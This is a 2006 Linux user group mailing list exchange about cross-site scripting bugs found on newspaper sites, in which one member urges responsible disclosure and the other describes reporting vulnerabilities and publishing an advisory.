[TriLUG] Google and the Triangle? Can this be true?

Russell Jones russ at virante.com
Sun Apr 2 16:36:20 EDT 2006


Yes, I have notified the newspapers, although I have yet to receive a
response. People, for some reason, do nto consider XSS to be as serious as
it is. I published an XSS vulnerability on Secunia for a popular guestbook
http://secunia.com/advisories/17159/ because a lot of businesses were
using it. There have been no updates yet. Similarly, I notified a popular
freeware site-search tool of their vulnerabilities, no updates either.

In this case, however, the possibilities are far less heinous. Perhaps it
would be possible for a crafty enough hacker to steal an individual's
login information to their newspaper subscription, but the escalation from
their is not nearly as dangerous as an XSS exploit on a bank or ecommerce
site.

Russ


> Russell Jones wrote:
>
>>I had to do it - did you check out my site http://www.xssfools.com ?
>>
>>
> I trust that you brought the XSS bugs to the attention of the authors of
> the various websites?  There are far more devious and irresponsible
> things to be done with XSS, and your site is essentially providing a
> fast and easy template to exploit known bugs with their websites.
> That's all well and good, imho, if you at least sent an email to the
> appropriate contact emails, and they ackowledged it's a bug and don't
> care.  I'm sure I don't need to point out some of the potentially bad
> things that can be done with XSS, from site-cooking stealing to
> attempting to fool the admins into visiting the URL to steal passwords /
> elevated priviledges, confidence schemes, email address harvesting (from
> logged in users), etc, etc.
>
> Please, tinker.  But tinker responsibly.
> Aaron S. Joyner
> --
> TriLUG mailing list        : http://www.trilug.org/mailman/listinfo/trilug
> TriLUG Organizational FAQ  : http://trilug.org/faq/
> TriLUG Member Services FAQ : http://members.trilug.org/services_faq/
>


-- 
Russell P. Jones
Chief Information Officer
Virante Incorported
http://www.virante.com




More information about the TriLUG mailing list